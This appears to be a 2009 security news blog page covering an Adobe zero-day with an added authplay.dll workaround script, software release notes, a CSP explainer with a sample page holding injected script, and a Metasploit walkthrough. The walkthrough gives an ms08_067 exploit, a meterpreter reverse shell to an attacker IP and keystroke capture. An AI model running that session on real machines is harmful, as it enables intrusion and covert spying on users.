Zero-day vulnerability in Adobe Flash Player, Reader and Acrobat

July 23, 2009 – 5:20 AM

Adobe is warning of a critical security vulnerability in its current Flash Player for Windows, Macintosh and Linux. Adobe Reader and Acrobat 9.x for all platforms are also affected. The vulnerability is already being actively exploited in two ways: via crafted PDF documents and via manipulated web sites (drive-by downloads). It is reported that the exploit used in drive-by downloads can infect the PCs of users of both Internet Explorer and Firefox.

Adobe is working on a solution to the problem and believes that it will be able to provide an update by the 30th of July for Flash Player for Windows, Macintosh and Linux, with the Solaris version following a little later. The update for Adobe Reader and Acrobat, at least for Windows and Mac, is expected to appear on 31 July. An exact date for the Unix version has yet to be announced.

Adobe itself has so far only observed specific attacks against Reader and, until a patch is available, recommends that users of Reader for Windows either delete authplay.dll, rename it, or make it inaccessible. This file is normally located at C:\Program Files\Adobe\Reader 9.0\Reader\authplay.dll. Adobe does note though that as a result of moving or deleting authplay.dll “users will experience a non-exploitable crash or error message when opening a PDF that contains SWF content”. Instructions for other platforms were not issued by Adobe.

Alternatively, disabling Flash in Adobe Reader may help. Permissions can be changed under Edit, Preferences, then Multimedia Trust. Disabling JavaScript is said not to protect against the exploit. Adobe recommends Flash users treat untrusted pages with extreme caution, but doesn’t spell out how to put this into practice.
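
The rename workaround above, written out as a small Python script. This is an added example, not code from the article or from Adobe: the Reader directory defaults to the path Adobe quotes, the `.disabled` suffix is our own choice (any name Reader will not load works), and `make_demo_dir` builds a stand-in directory so the audit/disable/restore cycle can be exercised without a real Reader install.

```python
"""Added example (not from the article or from Adobe): check a Reader 9
install directory for authplay.dll and apply the rename workaround the
advisory describes, with a matching restore step for after the patch."""
import os
import tempfile
from pathlib import Path

READER_DIR = Path(r"C:\Program Files\Adobe\Reader 9.0\Reader")  # path quoted by Adobe
DLL = "authplay.dll"
DISABLED = DLL + ".disabled"  # assumption: our own suffix; Reader will not load it


def authplay_state(reader_dir):
    """Return 'present' (DLL still loadable), 'disabled' (renamed) or 'absent'."""
    reader_dir = Path(reader_dir)
    if (reader_dir / DLL).is_file():
        return "present"
    if (reader_dir / DISABLED).is_file():
        return "disabled"
    return "absent"


def disable_authplay(reader_dir):
    """Rename authplay.dll out of the way. Idempotent; returns the resulting state.
    Reader must be closed first: Windows refuses to rename a DLL that is loaded."""
    reader_dir = Path(reader_dir)
    if authplay_state(reader_dir) == "present":
        os.replace(reader_dir / DLL, reader_dir / DISABLED)
    return authplay_state(reader_dir)


def restore_authplay(reader_dir):
    """Put the DLL back once the patched Reader is installed."""
    reader_dir = Path(reader_dir)
    if authplay_state(reader_dir) == "disabled":
        os.replace(reader_dir / DISABLED, reader_dir / DLL)
    return authplay_state(reader_dir)


def make_demo_dir():
    """Constructed stand-in for a Reader directory, so the workflow runs on any OS."""
    demo = Path(tempfile.mkdtemp(prefix="reader9-"))
    (demo / DLL).write_bytes(b"")  # empty placeholder, not the real DLL
    return demo


if __name__ == "__main__":
    # Only audit the real install; demonstrate the rename cycle on the stand-in.
    print("real install:", authplay_state(READER_DIR))
    demo = make_demo_dir()
    print("demo before :", authplay_state(demo))
    print("demo disable:", disable_authplay(demo))
    print("demo restore:", restore_authplay(demo))
```

Note that the script only neutralises the one file Adobe names; a PDF with SWF content will then crash or error, exactly as Adobe's advisory says.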

Source:
http://www.h-online.com/security/Zero-day-vulnerability-in-Adobe-Flash-Player-Reader-and-Acrobat–/news/113828

VirtualBox 3.0.0 Released

June 30, 2009 – 12:23 PM

VirtualBox is a family of powerful x86 virtualization products for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL).

Presently, VirtualBox runs on Windows, Linux, Macintosh and OpenSolaris hosts and supports a large number of guest operating systems including but not limited to Windows (NT 4.0, 2000, XP, Server 2003, Vista), DOS/Windows 3.x, Linux (2.4 and 2.6), Solaris and OpenSolaris, and OpenBSD.

VirtualBox is being actively developed with frequent releases and has an ever growing list of features, supported guest operating systems and platforms it runs on. VirtualBox is a community effort backed by a dedicated company: everyone is encouraged to contribute while Sun ensures the product always meets professional quality criteria.


Changelog:
http://www.virtualbox.org/wiki/Changelog

Download:
http://www.virtualbox.org/wiki/Downloads

Firefox 3.5 Released

June 30, 2009 – 12:14 PM

Firefox 3.5 is based on the Gecko 1.9.1 rendering platform, which has been under development for the past year. Firefox 3.5 offers many changes over the previous version, supporting new web technologies, improving performance and ease of use.

Some of the notable features are:

  • Support for the HTML5 <video> and <audio> elements including native support for Ogg Theora encoded video and Vorbis encoded audio.
  • Improved tools for controlling your private data, including a Private Browsing Mode.
  • Better web application performance using the new TraceMonkey JavaScript engine.
  • The ability to share your location with websites using Location Aware Browsing.
  • Support for native JSON, and web worker threads.
  • Improvements to the Gecko layout engine, including speculative parsing for faster content rendering.
  • Support for new web technologies such as: downloadable fonts, CSS media queries, new transformations and properties, JavaScript query selectors, HTML5 local storage and offline application storage, <canvas> text, ICC profiles, and SVG transforms.


Download:
http://www.mozilla.com/en-US/firefox/upgrade.html

Shutting Down XSS with Content Security Policy

June 23, 2009 – 9:34 AM

For several years, Cross-Site Scripting (XSS) attacks have plagued many of the web’s most popular sites and victimized their users. At Mozilla, we’ve been working for the last year on a new technology called Content Security Policy, designed to shut these attacks down. We wanted to give a bit of background on this project as well as provide an update on our progress so far.

XSS is possible because all the content received as part of a web server response is treated with equal privilege by the requesting browser. JavaScript and other content included in a web page are all combined into a single security context which has full access to the DOM. Content Security Policy (CSP) provides a mechanism for sites to explicitly tell the browser which content is legitimate. The browser can then disregard any content which has not been blessed by the site.

In order to differentiate legitimate content from injected or modified content, CSP requires that all JavaScript for a page be 1) loaded from an external file, and 2) served from an explicitly approved host. This means that all inline script, javascript: URIs, and event-handling HTML attributes will be ignored. Only script included via a <script> tag pointing to a white-listed host will be treated as valid. Additionally, CSP allows several other common-sense security restrictions to be enforced.
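
To make the rule in the paragraph above concrete, here is a small Python model of how a CSP-aware browser sorts the script found in a page into what runs and what is ignored. It is an added example, not code from the Mozilla post or from Firefox. It assumes the draft header syntax of the time (an `allow` default directive plus `script-src`), matches sources by host name only (the real policy also considers scheme and port), and uses a constructed sample page and policy.

```python
"""Added example (not from the Mozilla post or from Firefox): a small model of
how a CSP-aware browser decides which script in a page may execute.  Uses the
draft header syntax of the time ('allow' default plus 'script-src'); hosts are
matched by name only, a simplification of the real rules."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


def parse_policy(header):
    """Split "allow 'self'; script-src a.example.com" into {directive: [sources]}."""
    policy = {}
    for clause in header.split(";"):
        tokens = clause.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def source_host(source):
    """Strip an optional scheme, port and path from a source expression."""
    return source.split("://")[-1].split("/")[0].split(":")[0].lower()


def host_allowed(host, sources, page_host):
    """True if host matches a source: 'self', an exact host, or a *.domain wildcard."""
    for source in sources:
        if source == "'self'":
            if host == page_host:
                return True
        elif source.startswith("*."):
            if host.endswith(source[1:]):  # "*.example.com" -> ".example.com"
                return True
        elif host == source_host(source):
            return True
    return False


class ScriptCollector(HTMLParser):
    """Record every place a page could execute script, in document order:
    <script> elements, on* event-handler attributes and javascript: URIs."""

    def __init__(self):
        super().__init__()
        self.found = []  # (kind, detail)
        self._in_script = False
        self._src = None
        self._inline = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.startswith("on"):
                self.found.append(("event-handler", f"<{tag} {name}>"))
            elif value and value.strip().lower().startswith("javascript:"):
                self.found.append(("javascript-uri", f"<{tag} {name}>"))
        if tag == "script":
            self._in_script, self._src, self._inline = True, dict(attrs).get("src"), []

    def handle_data(self, data):
        if self._in_script:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._inline).strip()
            if self._src:
                self.found.append(("external", self._src))
            elif body:
                self.found.append(("inline", body))


def apply_policy(html, header, page_url):
    """Return [(kind, detail, allowed)] for every script-bearing item in the page."""
    policy = parse_policy(header)
    sources = policy.get("script-src", policy.get("allow", []))  # script-src overrides allow
    page_host = urlsplit(page_url).hostname
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    verdicts = []
    for kind, detail in collector.found:
        if kind == "external":
            host = urlsplit(detail).hostname or page_host  # relative src => same host
            allowed = host_allowed(host.lower(), sources, page_host)
        else:
            allowed = False  # inline code, javascript: URIs and handlers never run under CSP
        verdicts.append((kind, detail, allowed))
    return verdicts


# Constructed sample page and policy (not from the post).
SAMPLE_PAGE = """<html><body>
<script src="https://scripts.example.com/app.js"></script>
<script src="https://cdn.attacker.example/x.js"></script>
<script>alert(document.cookie)</script>
<a href="javascript:alert(1)">click</a>
<img src="/logo.png" onerror="alert(1)">
</body></html>"""
SAMPLE_HEADER = "allow 'self'; script-src scripts.example.com"

if __name__ == "__main__":
    for kind, detail, allowed in apply_policy(SAMPLE_PAGE, SAMPLE_HEADER, "https://www.example.com/"):
        print("RUN " if allowed else "DROP", f"{kind:15}", detail)
```

Only the first item, the external file from the white-listed host, survives; the injected inline block, the `javascript:` link and the `onerror` handler are dropped regardless of how they got into the page, which is the whole point of the design.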

Source:
http://blog.mozilla.com/security/2009/06/19/shutting-down-xss-with-content-security-policy/

Capturing Keystrokes With Metasploit

June 22, 2009 – 1:09 PM

I was contacted privately about this, so I thought I would post a step-by-step guide on how to capture keystrokes from a target machine using Metasploit.


Instead of posting a ton of screenshots, I will provide the commands in text below, step-by-step:

msf > use exploit/windows/smb/ms08_067_netapi (only an example – use whatever exploit the target machine is vulnerable to)
msf exploit(ms08_067_netapi) > set rhost 192.168.1.104 (target)
rhost => 192.168.1.104
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.1.106 (attacker)
lhost => 192.168.1.106
msf exploit(ms08_067_netapi) > set target 3
target => 3
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.104:1049)

meterpreter > keyscan_start
Starting the keystroke sniffer…

(target machine)
meterpreter > keyscan_stop
Stopping the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
Top secret text.  Don’t tell my wife.
meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > exit
root@backtrack:/pentest/exploits/framework3#